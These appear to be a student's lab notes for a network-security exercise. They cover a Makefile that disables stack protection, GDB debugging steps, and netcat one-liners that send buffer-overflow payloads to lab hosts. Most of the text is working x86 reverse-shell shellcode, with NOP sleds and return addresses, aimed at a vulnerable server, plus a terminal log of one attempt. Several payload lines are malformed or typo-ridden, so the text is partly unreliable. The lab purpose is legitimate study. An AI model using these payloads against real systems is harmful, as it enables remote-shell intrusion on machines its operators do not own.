Makefile
--------------
all:
	gcc -m32 -fno-stack-protector -z execstack -o server server.c
clean:
	rm -f *.o 
	
IP: 192.168.57.4 (Gangsta)
Port: 8000
127.0.1.1 (Bandit)
===========================GDB Steps====================================================
gcc -g -o server server.c -m32 -fno-stack-protector -z execstack
gdb -q server
set disassembly-flavor intel
disas main
disas process
b main
b *main + 697
b *process + 22
b *main + 722
./server 20003 // First window - server running
nc -v -v -l 20003 // Second window - client running
python -c 'print "021" + "A"*520' | nc -v -v 127.0.0.1 20003 // Third window - running the program
python -c 'print "021" +"\x90"*290+ + "A"*235' (First window) -- r 32912 (Second window) // Causes buffer overflow
print &buf // get the address of buff
i r //get the address present at esp
print <esp-addr> - <buff addr>
x/500xw <address of ebp> // get the location of envp variable
x/500x $esp
x/i <address> //to get the instruction at that location
x/s <address> //to get the string present at that location

/* Change the port */
python -c 'print "021"+"\x90"*222+"\x90"*2+"\x81\xc4\x54\xf2\xff\xff" + "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93" + "\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\xc0\xa8\x39\x03" + "\x66\x68\x11\x45\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89" + "\xe1\x43\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" + "\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";"+"\x90"*222+"\x30\xda\xff\xff"' | nc -v -v gangsta 8000

//"021" + "\x90"*224 + "\x90" +76 bytes of shell code + "\x90"*224

---------------------------------------------------------------------------------------------------------------------------------

" python -c 'print "021" + "\x90 * 249 + "\x68\xc0\xA8\x39\x03\x5e\x66\x68\x1E\x61\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xce\" + "\x90 * 200 + return_address + "\xff\xff\"' | nc -v -v gangsta 8000"

\x81\xc4\x54\xf2\xff\xff\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\xc0\xa8\x39\x03\x66\x68\x1F\x40\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80

---------------------------------------------------
Port: 45454

 python -c 'print "021" + "\x90" * 224 + "\x81\xc4\x54\xf2\xff\xff" + "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93" + "\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\xc0\xa8\x39\x03" + "\x66\x68\xb1\x8e\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89" + "\xe1\x43\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" + "\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x90" * 222 + "\x30\xda\xff\xff"' | nc -v -v 192.168.57.3 20003
 
 ----
 husky021@bandit:~$ python -c 'print "021" + "\x90" * 224 + "\x81\xc4\x54\xf2\\xff" + "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93" + "\x5b0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\xc0\xa8\x39\x03" + "\x66\x68\xb1\x8e\xx66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89" + "\xe1\x43\xcd\x80\x52\x68\x2f\x2f\\x68\x68\x2f\x62\x69\x6e" + "\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x9* 221 + "\x30\xda\xff\xff"' | nc -v -v 192.168.57.3 20004
bandit.inetsec.edu [192.168.57.3] 20004 (?) open
021¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦T¦¦¦1¦SCfX¦¦?¦Y¦??Iy¦[Zh¦9fh¦¦CfS¦¦fPQS¦¦C?Rh//shh/bin¦¦RS¦¦
                                                 ?¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦0¦¦¦
^Z
[6]+  Stopped    